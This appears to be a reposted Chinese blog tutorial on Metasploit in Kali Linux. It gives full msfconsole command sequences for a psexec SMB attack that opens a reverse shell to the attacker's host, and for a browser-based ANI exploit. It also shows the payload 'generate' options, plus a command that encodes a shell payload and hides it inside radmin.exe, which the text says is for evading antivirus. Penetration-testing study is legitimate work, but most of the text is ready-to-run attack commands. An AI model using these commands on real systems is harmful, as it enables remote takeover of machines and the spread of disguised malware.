kali linux之Msf-exploit模塊,生成payload


Exploit模塊

 

Active exploit(主動地向目標機器發送payload並執行,使目標交出shell(反連等)

msf5 > use exploit/windows/smb/psexec

msf5 exploit(windows/smb/psexec) > set RHOST 192.168.1.13

msf5 exploit(windows/smb/psexec) > set payload windows/shell/reverse_tcp

msf5 exploit(windows/smb/psexec) > set LHOST 192.168.1.10

msf5 exploit(windows/smb/psexec) > set LPORT 4444

msf5 exploit(windows/smb/psexec) > set SMBUSER admi1

msf5 exploit(windows/smb/psexec) > set SMBPASS 123

msf5 exploit(windows/smb/psexec) > exploit -j

 

Passive exploit(利用目標機器的客戶端程序的漏洞來利用,客戶端程序請求服務端時候,返回漏洞代碼,加載payload,交出shell)

msf5 > use exploit/windows/browser/ms07_017_ani_loadimage_chunksize

msf5 exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > set SRVHOST 192.168.1.10

msf5 exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > set payload windows/shell/reverse_tcp

msf5 exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > set LHOST 192.168.1.10

msf5 exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > exploit -j

 

 

生成Payload

 

 

generate

用法:生成  [選項]

選項:
    -E             強制編碼
    -O            不推薦使用:'-o'選項的別名
    -P             所需的有效負載總大小,自動生成適當的NOPsled長度
    -S             生成Windows二進制文件時使用的新節名稱
    -b             要避免的字符列表示例:'\x00\xff'
    -e             要使用的編碼器
    -f              輸出格式:bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,axis2,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,jar,jsp,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-cmd,psh-net,psh-reflection,vba,vba-exe,vba-psh,vbs,war
    -h            顯示此消息
    -i             對有效負載進行編碼的次數
    -k            保留模板行為並將有效負載注入新線程
    -n            在有效負載上添加[length]大小的nopsled
    -o            輸出文件名(否則為stdout)
    -p            有效負載的平台
    -s            NOP長度,EIP返回到存儲NOP sled的任意地址時將遞增,最終導致shellcode執行
    -x            指定要用作模板的自定義可執行文件

 

 generate---生成payload(這樣生成的payload會有壞字符)

 

 encoders---generate生成payload的時候會智能的去選擇encoders

 

 

generate -b '\x00'

 

 generate -b '\x00\xff'

 

msf5 payload(windows/shell_bind_tcp) > generate -b '\x00' -e x86/shikata_ga_nai -i 5 -k -x /usr/share/windows-binaries/radmin.exe -f exe -o /root/xx.exe(經過編碼或者使用模板,可以簡單的免殺)

 

額........比沒混淆前好多了

 

 

 

 

 友情鏈接 http://www.cnblogs.com/klionsec

               http://www.cnblogs.com/l0cm

               http://www.cnblogs.com/Anonyaptxxx

               http://www.feiyusafe.cn


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM